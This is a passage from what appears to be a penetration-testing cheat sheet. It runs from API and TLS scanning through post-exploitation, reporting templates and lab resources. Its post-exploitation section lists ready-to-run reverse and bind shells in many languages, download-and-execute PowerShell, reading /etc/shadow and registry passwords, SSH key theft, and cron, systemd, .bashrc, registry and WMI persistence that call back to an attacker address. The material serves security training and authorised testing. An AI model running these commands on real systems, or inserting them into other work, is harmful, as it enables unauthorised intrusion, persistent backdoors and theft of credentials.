times\n}\n\n# Introspection abuse\nquery {\n  __schema {\n    types {\n      name\n      fields {\n        name\n        type {\n          name\n          fields {\n            name\n            type {\n              name\n            }\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n### API Security Tools\n\n#### Postman/Newman\n```bash\n# Run collections\nnewman run collection.json -e environment.json\n\n# With data\nnewman run collection.json -d data.csv\n\n# HTML report\nnewman run collection.json -r htmlextra\n```\n\n#### OWASP ZAP API Scan\n```bash\n# API scan\nzap-api-scan.py -t https://target.com/swagger.json -f openapi\n\n# Active scan\nzap-api-scan.py -t https://target.com/swagger.json -f openapi -a\n```\n\n#### Kiterunner\n```bash\n# API endpoint discovery\nkr scan https://target.com -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt\n\n# Bruteforce with wordlist\nkr brute https://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt\n```\n\n---\n\n## SSL/TLS Security\n\n### SSL/TLS Scanning\n\n#### testssl.sh\n```bash\n# Basic scan\n./testssl.sh https://target.com\n\n# JSON output\n./testssl.sh --jsonfile results.json https://target.com\n\n# HTML report\n./testssl.sh --htmlfile report.html https://target.com\n\n# Check specific vulnerabilities\n./testssl.sh --heartbleed https://target.com\n./testssl.sh --poodle https://target.com\n./testssl.sh --freak https://target.com\n./testssl.sh --logjam https://target.com\n./testssl.sh --crime https://target.com\n./testssl.sh --breach https://target.com\n```\n\n#### sslyze\n```bash\n# Basic scan\nsslyze target.com\n\n# Check certificates\nsslyze --certinfo target.com\n\n# Check protocols\nsslyze --tlsv1 --tlsv1_1 --tlsv1_2 --tlsv1_3 target.com\n\n# Check vulnerabilities\nsslyze --heartbleed --robot --fallback target.com\n\n# JSON output\nsslyze --json_out=results.json target.com\n```\n\n#### sslscan\n```bash\n# Basic scan\nsslscan target.com:443\n\n# Show certificate\nsslscan --show-certificate target.com\n\n# Check ciphers\nsslscan --no-ciphersuites target.com\n```\n\n### Manual SSL/TLS Checks\n\n```bash\n# OpenSSL connection\nopenssl s_client -connect target.com:443\nopenssl s_client -connect target.com:443 -tls1_2\nopenssl s_client -connect target.com:443 -cipher 'ECDHE-RSA-AES128-GCM-SHA256'\n\n# Certificate details\necho | openssl s_client -connect target.com:443 2&gt;/dev/null | openssl x509 -text\n\n# Check expiration\necho | openssl s_client -connect target.com:443 2&gt;/dev/null | openssl x509 -noout -dates\n\n# Check SAN\necho | openssl s_client -connect target.com:443 2&gt;/dev/null | openssl x509 -noout -ext subjectAltName\n\n# Supported protocols\nnmap --script ssl-enum-ciphers -p 443 target.com\n```\n\n### Security Headers Check\n\n```bash\n# HSTS check\ncurl -sI https://target.com | grep -i \"strict-transport-security\"\n\n# CSP check\ncurl -sI https://target.com | grep -i \"content-security-policy\"\n\n# HPKP (deprecated)\ncurl -sI https://target.com | grep -i \"public-key-pins\"\n\n# Expect-CT\ncurl -sI https://target.com | grep -i \"expect-ct\"\n\n# Certificate Transparency\ncurl -s https://crt.sh/?q=target.com\n```\n\n### SSL/TLS Vulnerabilities\n\n```bash\n# Heartbleed (CVE-2014-0160)\nnmap -p 443 --script ssl-heartbleed target.com\n\n# POODLE (CVE-2014-3566)\nnmap -p 443 --script ssl-poodle target.com\n\n# FREAK (CVE-2015-0204)\nnmap -p 443 --script ssl-freak target.com\n\n# DROWN (CVE-2016-0800)\nnmap -p 443 --script ssl-drown target.com\n\n# ROBOT (CVE-2017-17382)\nnmap -p 443 --script ssl-robot target.com\n\n# BEAST (CVE-2011-3389)\n# Check if TLS 1.0 is enabled\n\n# CRIME (CVE-2012-4929)\n# Check compression\n\n# BREACH (CVE-2013-3587)\n# Check HTTP compression\n```\n\n---\n\n## Post-Exploitation\n\n### Reverse Shells\n\n#### Linux Reverse Shells\n```bash\n# Bash\nbash -i &gt;&amp; /dev/tcp/10.10.14.1/4444 0&gt;&amp;1\n\n# Python\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'\n\n# PHP\nphp -r '$s=fsockopen(\"10.10.14.1\",4444);exec(\"/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'\n\n# Perl\nperl -e 'use Socket;$i=\"10.10.14.1\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"/bin/sh -i\");};'\n\n# Ruby\nruby -rsocket -e'f=TCPSocket.open(\"10.10.14.1\",4444).to_i;exec sprintf(\"/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d\",f,f,f)'\n\n# Netcat\nnc -e /bin/sh 10.10.14.1 4444\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.1 4444 &gt;/tmp/f\n\n# Telnet\nrm -f /tmp/p; mknod /tmp/p p &amp;&amp; telnet 10.10.14.1 4444 0/tmp/p\n\n# XTerm\nxterm -display 10.10.14.1:1\n```\n\n#### Windows Reverse Shells\n```powershell\n# PowerShell\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command \"IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.1/ps.ps1')\"\n\n# PowerShell one-liner\npowershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# Netcat\nnc.exe 10.10.14.1 4444 -e cmd.exe\n\n# msfvenom\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe\n\n# VB Script\n# Create reverse shell VBS script\n```\n\n### Bind Shells\n\n```bash\n# Linux\nnc -lvnp 4444 -e /bin/sh\npython -c 'exec(\"import socket, subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1);s.bind((\\\"0.0.0.0\\\",4444));s.listen(1);c,a=s.accept();\\nwhile True: d=c.recv(1024); if len(d)==0: break; p=subprocess.Popen(d,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE); o=p.stdout.read()+p.stderr.read(); c.send(o)\")'\n\n# Windows\nnc.exe -lvnp 4444 -e cmd.exe\n```\n\n### TTY Upgrade\n\n```bash\n# Python\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Script\nscript /dev/null -qc /bin/bash\n\n# Socat\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.1:4444\n\n# After getting shell, background (Ctrl+Z) and:\nstty raw -echo; fg\nexport TERM=xterm\nstty rows 40 cols 150\n```\n\n### Privilege Escalation\n\n#### Linux Enumeration\n```bash\n# System info\nuname -a\ncat /etc/os-release\ncat /etc/issue\nhostname\n\n# User info\nid\nwhoami\nsudo -l\ncat /etc/passwd\ncat /etc/shadow\nhistory\n\n# Process info\nps aux\nps -ef\ntop -n 1\n\n# Network info\nifconfig\nip a\nnetstat -an\nnetstat -tulpn\nss -tulpn\ncat /etc/hosts\n\n# File system\nfind / -perm -4000 2&gt;/dev/null   # SUID\nfind / -perm -2000 2&gt;/dev/null   # SGID\nfind / -writable -type f 2&gt;/dev/null | grep -v proc\nfind / -name \"*.key\" -o -name \"*.pem\" -o -name \"*.crt\" 2&gt;/dev/null\n\n# Cron jobs\ncat /etc/crontab\nls -la /etc/cron*\ngrep \"CRON\" /var/log/syslog\n\n# Installed software\ndpkg -l\nrpm -qa\npip list\ngem list\nnpm list -g\n\n# Environment variables\nenv\ncat ~/.bashrc\ncat ~/.bash_profile\n\n# Log files\ncat /var/log/auth.log\ncat /var/log/apache2/access.log\ncat /var/log/mysql/error.log\n\n# Config files\nfind / -name \"*.conf\" -o -name \"*.config\" 2&gt;/dev/null\n```\n\n#### Linux Privilege Escalation Tools\n```bash\n# LinPEAS\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n\n# LinEnum\nwget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\nchmod +x LinEnum.sh\n./LinEnum.sh\n\n# Linux Exploit Suggester\nwget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh\nchmod +x linux-exploit-suggester.sh\n./linux-exploit-suggester.sh\n\n# pspy (process monitor)\nwget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64\nchmod +x pspy64\n./pspy64\n```\n\n#### Windows Enumeration\n```powershell\n# System info\nsysteminfo\nwmic os get caption,version,buildnumber\nwmic computersystem get domain,manufacturer,model,name\n\n# User info\nwhoami\nwhoami /priv\nwhoami /groups\nnet users\nnet localgroup administrators\n\n# Process info\ntasklist /v\nwmic process list full\n\n# Network info\nipconfig /all\nnetstat -an\nroute print\narp -a\n\n# File system\ndir C:\\\ndir \"C:\\Program Files\"\ndir \"C:\\Program Files (x86)\"\ndir C:\\Users\ndir /s *.config\ndir /s *.kdbx\ndir /s *.key\n\n# Services\nwmic service list brief\nsc query\nnet start\n\n# Installed software\nwmic product get name,version,vendor\ndir \"C:\\Program Files\"\nGet-ChildItem -Path \"C:\\Program Files\" -Recurse\n\n# Scheduled tasks\nschtasks /query /fo LIST /v\nGet-ScheduledTask\n\n# Registry\nreg query HKLM /f \"password\" /t REG_SZ /s\nreg query HKCU /f \"password\" /t REG_SZ /s\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"\n```\n\n#### Windows Privilege Escalation Tools\n```powershell\n# WinPEAS\nwget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe\n.\\winPEASany.exe\n\n# PowerUp\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')\nInvoke-AllChecks\n\n# Sherlock\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')\nFind-AllVulns\n\n# Windows Exploit Suggester\nwget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py\npython windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt\n```\n\n### Persistence\n\n#### Linux Persistence\n```bash\n# SSH key\nmkdir -p ~/.ssh\necho \"ssh-rsa AAAAB3...\" &gt;&gt; ~/.ssh/authorized_keys\n\n# Cron job\necho \"* * * * * /bin/bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.1/4444 0&gt;&amp;1'\" &gt; /tmp/cron\ncrontab /tmp/cron\n\n# Systemd service\ncat &gt; /etc/systemd/system/persistence.service &lt;&lt; EOF\n[Unit]\nDescription=Persistence\n\n[Service]\nType=simple\nExecStart=/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.1/4444 0&gt;&amp;1'\nRestart=always\n\n[Install]\nWantedBy=multi-user.target\nEOF\n\nsystemctl enable persistence.service\nsystemctl start persistence.service\n\n# .bashrc\necho 'bash -i &gt;&amp; /dev/tcp/10.10.14.1/4444 0&gt;&amp;1 &amp;' &gt;&gt; ~/.bashrc\n\n# Web shell\necho '' &gt; /var/www/html/shell.php\n```\n\n#### Windows Persistence\n```powershell\n# Registry\nNew-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Backdoor\" -Value \"C:\\shell.exe\"\n\n# Scheduled task\nschtasks /create /tn \"Backdoor\" /tr \"C:\\shell.exe\" /sc onlogon /ru SYSTEM\n\n# Startup folder\ncopy shell.exe \"C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\n\n# WMI persistence\n$filter = ([wmiclass]\"\\\\.\\root\\subscription:__EventFilter\").CreateInstance()\n$filter.QueryLanguage = \"WQL\"\n$filter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\n$filter.Name = \"Backdoor\"\n$filter.EventNamespace = 'root\\cimv2'\n$result = $filter.Put()\n\n$consumer = ([wmiclass]\"\\\\.\\root\\subscription:CommandLineEventConsumer\").CreateInstance()\n$consumer.Name = 'BackdoorConsumer'\n$consumer.CommandLineTemplate = \"C:\\shell.exe\"\n$result = $consumer.Put()\n\n# Service\nsc.exe create Backdoor binPath= \"C:\\shell.exe\" start= auto\nsc.exe start Backdoor\n```\n\n### Lateral Movement\n\n#### SSH\n```bash\n# SSH key stealing\nfind / -name \"id_rsa\" 2&gt;/dev/null\ncat ~/.ssh/id_rsa\n\n# SSH agent forwarding\nssh -A user@target.com\n\n# SSH tunneling\nssh -L 8080:localhost:80 user@target.com    # Local forward\nssh -R 8080:localhost:80 user@target.com    # Remote forward\nssh -D 1080 user@target.com                  # Dynamic proxy\n```\n\n#### Windows Lateral Movement\n```powershell\n# PSExec\n.\\PsExec.exe \\\\target -u user -p pass cmd.exe\n\n# WinRM\nEnter-PSSession -ComputerName target -Credential $cred\nInvoke-Command -ComputerName target -ScriptBlock {whoami} -Credential $cred\n\n# WMI\nwmic /node:target /user:user /password:pass process call create \"cmd.exe\"\n\n# SMB\nnet use \\\\target\\c$ /user:user pass\ncopy shell.exe \\\\target\\c$\\Windows\\Temp\\\n```\n\n### Pivoting\n\n#### SSH Pivoting\n```bash\n# Local port forwarding\nssh -L 8080:internal-server:80 user@pivot-host\n\n# Remote port forwarding\nssh -R 8080:localhost:80 user@pivot-host\n\n# Dynamic SOCKS proxy\nssh -D 1080 user@pivot-host\n\n# SSH tunneling with ProxyCommand\nssh -o ProxyCommand=\"ssh -W %h:%p user@pivot-host\" target\n```\n\n#### SOCKS Proxies\n```bash\n# Using proxychains\necho \"socks4 127.0.0.1 1080\" &gt;&gt; /etc/proxychains.conf\nproxychains nmap -sT -Pn target\n\n# Using chisel\n# Server (attacker)\n./chisel server -p 8000 --reverse\n# Client (pivot)\n./chisel client attacker:8000 R:socks\n\n# Using EarthWorm\n./ew -s ssocksd -l 1080\n```\n\n#### Port Forwarding\n```bash\n# Linux\n# SSH forwarding\nssh -L 8080:localhost:80 user@pivot\n\n# Netcat forwarding\nmkfifo /tmp/fifo\nnc -l -p 8080 &lt; /tmp/fifo | nc target 80 &gt; /tmp/fifo\n\n# Socat forwarding\nsocat TCP-LISTEN:8080,fork TCP:target:80\n\n# Windows\n# netsh port forwarding\nnetsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=target\n```\n\n---\n\n## Reporting\n\n### Report Structure\n\n#### Executive Summary\n```\nEXECUTIVE SUMMARY\n=================\n- Overview of engagement\n- Key findings (high-level)\n- Risk ratings\n- Business impact\n- Strategic recommendations\n- Scope and methodology summary\n```\n\n#### Technical Details\n```\nTECHNICAL FINDINGS\n==================\nFinding #1: [Title]\n- Severity: Critical/High/Medium/Low/Info\n- CVSS Score: X.X (Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n- CWE: CWE-89\n- CVE: CVE-2024-XXXX (if applicable)\n- Affected Component: /path/to/vulnerable/endpoint\n- Description: Detailed description of the vulnerability\n- Impact: What an attacker can achieve\n- Evidence: Proof of concept, screenshots, request/response\n- Remediation: How to fix the issue\n- References: Links to documentation, CVEs, etc.\n```\n\n#### Remediation Recommendations\n```\nREMEDIATION GUIDELINES\n======================\nShort-term fixes:\n1. [Immediate actions]\n\nLong-term solutions:\n1. [Architectural changes]\n\nSecurity controls to implement:\n1. [Preventive controls]\n2. [Detective controls]\n3. [Corrective controls]\n```\n\n### Reporting Tools\n\n#### Dradis Framework\n```bash\n# Install\ngem install dradis\n\n# Start\ndradis start\n\n# Web interface at https://localhost:3000\n```\n\n#### Serpico\n```bash\n# Install\ngit clone https://github.com/SerpicoProject/Serpico.git\ncd Serpico\nbundle install\nruby serpico.rb\n```\n\n#### Pwndoc\n```bash\n# Docker\ndocker run -p 4242:4242 pwndoc/pwndoc\n```\n\n### Report Templates\n\n#### Markdown Template\n```markdown\n# Penetration Test Report\n\n## 1. Executive Summary\n[1-2 paragraphs describing the engagement and key findings]\n\n**Total Findings:** X\n- Critical: X\n- High: X\n- Medium: X\n- Low: X\n- Informational: X\n\n## 2. Scope\n- In-scope: [domains, IP ranges, applications]\n- Out-of-scope: [excluded items]\n- Testing dates: [start date] to [end date]\n\n## 3. Methodology\n- Phase 1: Reconnaissance\n- Phase 2: Scanning &amp; Enumeration\n- Phase 3: Vulnerability Assessment\n- Phase 4: Exploitation\n- Phase 5: Post-Exploitation\n- Phase 6: Reporting\n\n## 4. Findings\n\n### 4.1 [Finding Title]\n**Severity:** Critical/High/Medium/Low/Info\n**CVSS:** X.X (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n**CWE:** CWE-89\n**Affected Component:** [URL/path]\n\n**Description:**\n[Detailed description]\n\n**Impact:**\n[What an attacker can achieve]\n\n**Evidence:**\n```\nRequest:\nGET /vulnerable.php?id=1' UNION SELECT 1,2,3--\n\nResponse:\n{\"id\":1,\"name\":\"admin\",\"email\":\"admin@localhost\"}\n```\n\n**Screenshot:**\n![Evidence](screenshots/finding1.png)\n\n**Remediation:**\n[Step-by-step fix]\n\n**References:**\n- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)\n\n## 5. Remediation Summary\n\n| Priority | Finding | Difficulty | Estimated Time |\n|----------|---------|------------|----------------|\n| Critical | SQL Injection | Medium | 2 hours |\n| High | XSS | Easy | 1 hour |\n| Medium | Missing HSTS | Easy | 30 minutes |\n\n## 6. Appendix\n- A. Tools Used\n- B. Wordlists\n- C. Raw Scan Results\n```\n\n#### Python Report Generator\n```python\n#!/usr/bin/env python3\n# report_generator.py\n\nimport json\nimport datetime\nfrom jinja2 import Template\n\nclass PentestReport:\n    def __init__(self, target, tester, date=None):\n        self.target = target\n        self.tester = tester\n        self.date = date or datetime.datetime.now().strftime(\"%Y-%m-%d\")\n        self.findings = []\n        self.scope = {}\n        self.summary = {}\n    \n    def add_finding(self, finding):\n        self.findings.append(finding)\n    \n    def generate_summary(self):\n        severity_counts = {\"critical\": 0, \"high\": 0, \"medium\": 0, \"low\": 0, \"info\": 0}\n        for f in self.findings:\n            severity_counts[f.get(\"severity\", \"info\").lower()] += 1\n        self.summary = severity_counts\n        return severity_counts\n    \n    def to_markdown(self):\n        template = Template(\"\"\"\n# Penetration Test Report: {{ target }}\n\n## Executive Summary\n**Date:** {{ date }}\n**Tester:** {{ tester }}\n\n### Summary of Findings\n- Critical: {{ summary.critical }}\n- High: {{ summary.high }}\n- Medium: {{ summary.medium }}\n- Low: {{ summary.low }}\n- Info: {{ summary.info }}\n\n## Findings\n{% for finding in findings %}\n### {{ loop.index }}. {{ finding.title }}\n**Severity:** {{ finding.severity }}\n**CVSS:** {{ finding.cvss }}\n**Affected:** {{ finding.affected }}\n\n**Description:**\n{{ finding.description }}\n\n**Impact:**\n{{ finding.impact }}\n\n**Evidence:**\n```\n{{ finding.evidence }}\n```\n\n**Remediation:**\n{{ finding.remediation }}\n\n**References:**\n{% for ref in finding.references %}\n- {{ ref }}\n{% endfor %}\n\n---\n{% endfor %}\n        \"\"\")\n        \n        self.generate_summary()\n        return template.render(\n            target=self.target,\n            tester=self.tester,\n            date=self.date,\n            summary=self.summary,\n            findings=self.findings\n        )\n    \n    def to_json(self):\n        self.generate_summary()\n        return json.dumps({\n            \"metadata\": {\n                \"target\": self.target,\n                \"tester\": self.tester,\n                \"date\": self.date\n            },\n            \"summary\": self.summary,\n            \"findings\": self.findings\n        }, indent=2)\n\n# Example usage\nif __name__ == \"__main__\":\n    report = PentestReport(\"target.com\", \"awjunaid\")\n    \n    report.add_finding({\n        \"title\": \"SQL Injection in Login\",\n        \"severity\": \"critical\",\n        \"cvss\": \"9.8\",\n        \"affected\": \"/login\",\n        \"description\": \"The username parameter is vulnerable to SQL injection...\",\n        \"impact\": \"Attacker can bypass authentication and access all user data\",\n        \"evidence\": \"username=admin' OR '1'='1'--\",\n        \"remediation\": \"Use parameterized queries\",\n        \"references\": [\"https://owasp.org/SQLi\"]\n    })\n    \n    with open(\"report.md\", \"w\") as f:\n        f.write(report.to_markdown())\n    \n    with open(\"report.json\", \"w\") as f:\n        f.write(report.to_json())\n```\n\n---\n\n## Tools Reference\n\n### Comprehensive Tool List\n\n#### Reconnaissance\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Amass** | Subdomain enumeration | `amass enum -d target.com` |\n| **Sublist3r** | Subdomain discovery | `sublist3r -d target.com` |\n| **theHarvester** | OSINT gathering | `theHarvester -d target.com -b all` |\n| **dnsrecon** | DNS enumeration | `dnsrecon -d target.com` |\n| **massdns** | High-performance DNS | `massdns -r lists/resolvers.txt -t A domains.txt` |\n| **shodan** | Internet device search | `shodan search hostname:target.com` |\n| **censys** | Certificate search | `censys search target.com` |\n\n#### Scanning\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Nmap** | Port scanning | `nmap -sV -sC target.com` |\n| **Masscan** | High-speed scanning | `masscan -p1-65535 --rate=10000 target.com` |\n| **Rustscan** | Fast port scanner | `rustscan -a target.com` |\n| **Naabu** | Port scanning | `naabu -host target.com` |\n| **Httpx** | HTTP probing | `httpx -l hosts.txt -title -tech-detect` |\n\n#### Web Enumeration\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Gobuster** | Directory brute force | `gobuster dir -u target.com -w wordlist.txt` |\n| **FFUF** | Web fuzzing | `ffuf -u target.com/FUZZ -w wordlist.txt` |\n| **Dirb** | Directory scanner | `dirb http://target.com` |\n| **Wfuzz** | Web fuzzer | `wfuzz -c -z file,wordlist.txt target.com/FUZZ` |\n| **Nikto** | Web vulnerability scanner | `nikto -h target.com` |\n| **WhatWeb** | Technology detection | `whatweb target.com` |\n| **WPScan** | WordPress scanner | `wpscan --url target.com` |\n| **Joomscan** | Joomla scanner | `joomscan -u target.com` |\n| **Droopescan** | Drupal scanner | `droopescan scan drupal -u target.com` |\n\n#### Vulnerability Assessment\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Nuclei** | Template-based scanner | `nuclei -u target.com` |\n| **OpenVAS** | Vulnerability scanner | `gvm-start` |\n| **Nessus** | Commercial scanner | `nessuscli scan new` |\n| **Wapiti** | Web vulnerability scanner | `wapiti -u https://target.com` |\n| **Arachni** | Web scanner | `arachni https://target.com` |\n\n#### Exploitation\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Metasploit** | Exploitation framework | `msfconsole` |\n| **SQLmap** | SQL injection | `sqlmap -u target.com?id=1` |\n| **Commix** | Command injection | `commix -u target.com?cmd=test` |\n| **BeEF** | Browser exploitation | `beef` |\n| **XSStrike** | XSS scanner | `xsstrike -u target.com?q=test` |\n| **Dalfox** | XSS scanner | `dalfox url target.com?p=test` |\n\n#### Password Attacks\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Hydra** | Online brute force | `hydra -l admin -P pass.txt target.com http-post-form` |\n| **Medusa** | Parallel brute force | `medusa -h target.com -U users.txt -P pass.txt -M http` |\n| **John** | Offline password cracker | `john --wordlist=rockyou.txt hash.txt` |\n| **Hashcat** | GPU password cracker | `hashcat -m 0 -a 0 hash.txt rockyou.txt` |\n| **CeWL** | Custom wordlist generator | `cewl https://target.com -w wordlist.txt` |\n\n#### Post-Exploitation\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **LinPEAS** | Linux privilege escalation | `./linpeas.sh` |\n| **WinPEAS** | Windows privilege escalation | `.\\winPEAS.exe` |\n| **Impacket** | Network protocols | `psexec.py user:pass@target` |\n| **Mimikatz** | Credential dumping | `mimikatz.exe` |\n| **BloodHound** | Active Directory mapping | `bloodhound-python -u user -p pass -d domain.local` |\n\n#### Proxies &amp; Interception\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Burp Suite** | Web proxy | Start from Applications menu |\n| **ZAP** | Web proxy | `zaproxy` |\n| **Mitmproxy** | CLI proxy | `mitmproxy` |\n| **Proxychains** | Proxy chaining | `proxychains nmap target.com` |\n\n#### Wordlists\n| Wordlist | Location | Description |\n|----------|----------|-------------|\n| **rockyou.txt** | `/usr/share/wordlists/rockyou.txt` | Common passwords |\n| **SecLists** | `/usr/share/seclists` | Comprehensive wordlists |\n| **dirb common** | `/usr/share/wordlists/dirb/common.txt` | Common directories |\n| **dirbuster** | `/usr/share/wordlists/dirbuster` | Directory lists |\n| **fuzzdb** | `/usr/share/fuzzdb` | Attack payloads |\n\n---\n\n## Practice Labs &amp; Resources\n\n### Online Platforms\n\n#### Free Labs\n| Platform | URL | Description |\n|----------|-----|-------------|\n| **PortSwigger Web Security Academy** | https://portswigger.net/web-security | Free XSS, SQLi, SSRF labs |\n| **OWASP WebGoat** | https://github.com/WebGoat/WebGoat | Vulnerable web app |\n| **OWASP Juice Shop** | https://github.com/juice-shop/juice-shop | Modern vulnerable app |\n| **DVWA** | http://www.dvwa.co.uk/ | Damn Vulnerable Web App |\n| **bWAPP** | http://www.itsecgames.com/ | Buggy web app |\n| **Mutillidae** | https://github.com/webpwnized/mutillidae | OWASP Mutillidae II |\n\n#### Paid/Subscription Labs\n| Platform | URL | Description |\n|----------|-----|-------------|\n| **HackTheBox** | https://www.hackthebox.com | Realistic machines |\n| **TryHackMe** | https://tryhackme.com | Guided learning |\n| **PentesterLab** | https://pentesterlab.com | Hands-on exercises |\n| **PentesterAcademy** | https://www.pentesteracademy.com | Video courses |\n| **Offensive Security Proving Grounds** | https://www.offensive-security.com/labs/ | OSCP practice |\n| **VulnHub** | https://www.vulnhub.com | Downloadable VMs |\n\n### CTF Platforms\n| Platform | URL | Focus |\n|----------|-----|-------|\n| **CTFtime** | https://ctftime.org | CTF calendar &amp; rankings |\n| **PicoCTF** | https://picoctf.org | Beginner-friendly |\n| **OverTheWire** | https://overthewire.org | WarGames |\n| **RingZer0** | https://ringzer0ctf.com | CTF challenges |\n| **Hacker101** | https://www.hacker101.com | Bug bounty training |\n\n### Bug Bounty Platforms\n| Platform | URL |\n|----------|-----|\n| **HackerOne** | https://www.hackerone.com |\n| **Bugcrowd** | https://www.bugcrowd.com |\n| **Intigriti** | https://www.intigriti.com |\n| **YesWeHack** | https://www.yeswehack.com |\n| **Synack** | https://www.synack.com |\n\n### Reference Materials\n\n#### Books\n| Title | Author | Focus |\n|-------|--------|-------|\n| **The Web Application Hacker's Handbook** | Stuttard &amp; Pinto | Web app testing |\n| **OWASP Testing Guide** | OWASP | Comprehensive methodology |\n| **Penetration Testing: A Hands-On Introduction** | Georgia Weidman | General pentesting |\n| **Red Team Field Manual** | Ben Clark | Quick reference |\n| **Blue Team Field Manual** | Alan White | Defense reference |\n| **Hacking: The Art of Exploitation** | Jon Erickson | Technical deep dive |\n\n#### Online Resources\n| Resource | URL | Focus |\n|----------|-----|-------|\n| **OWASP** | https://owasp.org | Web security |\n| **HackTricks** | https://book.hacktricks.xyz | Pentesting techniques |\n| **PayloadsAllTheThings** | https://github.com/swisskyrepo/PayloadsAllTheThings | Payload collection |\n| **GTFOBins** | https://gtfobins.github.io | Linux binary exploitation |\n| **LOLBAS** | https://lolbas-project.github.io | Windows binary exploitation |\n| **Exploit-DB** | https://www.exploit-db.com | Exploit database |\n| **CVE Details** | https://www.cvedetails.com | CVE database |\n| **MITRE ATT&amp;CK** | https://attack.mitre.org | Adversary tactics |\n\n### YouTube Channels\n| Channel | Focus |\n|---------|-------|\n| **IppSec** | HackTheBox walkthroughs |\n| **The Cyber Mentor** | Pentesting tutorials |\n| **ST\u00d6K** | Bug bounty |\n| **HackerSploit** | Security tutorials |\n| **John Hammond** | CTF walkthroughs |\n| **LiveOverflow** | Technical deep dives |\n\n### Certifications\n| Certification | Provider | Focus |\n|---------------|----------|-------|\n| **OSCP** | Offensive Security | Hands-on pentesting |\n| **OSWP** | Offensive Security | Wireless pentesting |\n| **OSWE** | Offensive Security | Web app pentesting |\n| **OSEP** | Offensive Security | Advanced evasion |\n| **CEH** | EC-Council | Ethical hacking |\n| **eWPT** | eLearnSecurity | Web pentesting |\n| **eCPPT** | eLearnSecurity | Network pentesting |\n| **PNPT** | TCM Security | Practical pentesting |\n| **GPEN** | GIAC | Network pentesting |\n| **GWAPT** | GIAC | Web app pentesting |\n| **CISSP** | ISC\u00b2 | Security management |\n\n---\n\n## Sample Scripts\n\n### Complete Reconnaissance Script\n\n```bash\n#!/bin/bash\n# recon.sh - Complete reconnaissance script\n# Usage: ./recon.sh target.com\n\nTARGET=\"$1\"\nOUTDIR=\"recon_${TARGET}_$(date +%Y%m%d_%H%M%S)\"\nmkdir -p \"$OUTDIR\"\ncd \"$OUTDIR\"\n\necho \"[*] Starting reconnaissance against $TARGET\"\necho \"[*] Output directory: $OUTDIR\"\n\n# 1. WHOIS\necho \"[*] WHOIS 